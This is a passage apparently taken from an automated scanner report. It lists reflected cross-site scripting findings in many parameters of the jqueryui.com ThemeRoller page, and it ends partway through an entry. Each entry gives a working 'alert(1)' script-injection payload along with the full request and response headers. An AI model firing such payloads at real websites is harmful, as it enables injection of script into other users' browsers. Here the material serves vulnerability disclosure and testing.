The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1bba"><script>alert(1)</script>d567ad6aac5 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6c1bba"><script>alert(1)</script>d567ad6aac5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:02:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff0c"><script>alert(1)</script>09e48b8ba84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec9ff0c"><script>alert(1)</script>09e48b8ba84&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a89eb"><script>alert(1)</script>243270c1e17 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca89eb"><script>alert(1)</script>243270c1e17&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 647b8"><script>alert(1)</script>eb0371bb5c was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee647b8"><script>alert(1)</script>eb0371bb5c&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120064
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66799"><script>alert(1)</script>b366a3b969c was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada66799"><script>alert(1)</script>b366a3b969c&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca091"><script>alert(1)</script>3b444860e28 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaca091"><script>alert(1)</script>3b444860e28&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:06:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146db"><script>alert(1)</script>2fe2f03b949 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa146db"><script>alert(1)</script>2fe2f03b949&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:06:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b6fb"><script>alert(1)</script>9fead6d3d2a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=654b6fb"><script>alert(1)</script>9fead6d3d2a&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:04:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a49f"><script>alert(1)</script>e2dd7647322 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=758a49f"><script>alert(1)</script>e2dd7647322&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:01:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d65"><script>alert(1)</script>b2f2024e930 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7564d65"><script>alert(1)</script>b2f2024e930&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:02:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea1d"><script>alert(1)</script>17d3870f713 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955ea1d"><script>alert(1)</script>17d3870f713&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1374"><script>alert(1)</script>39f6c08697f was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75a1374"><script>alert(1)</script>39f6c08697f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b60"><script>alert(1)</script>13f84838c4b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55b0b60"><script>alert(1)</script>13f84838c4b&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e74"><script>alert(1)</script>29c3c2098a8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
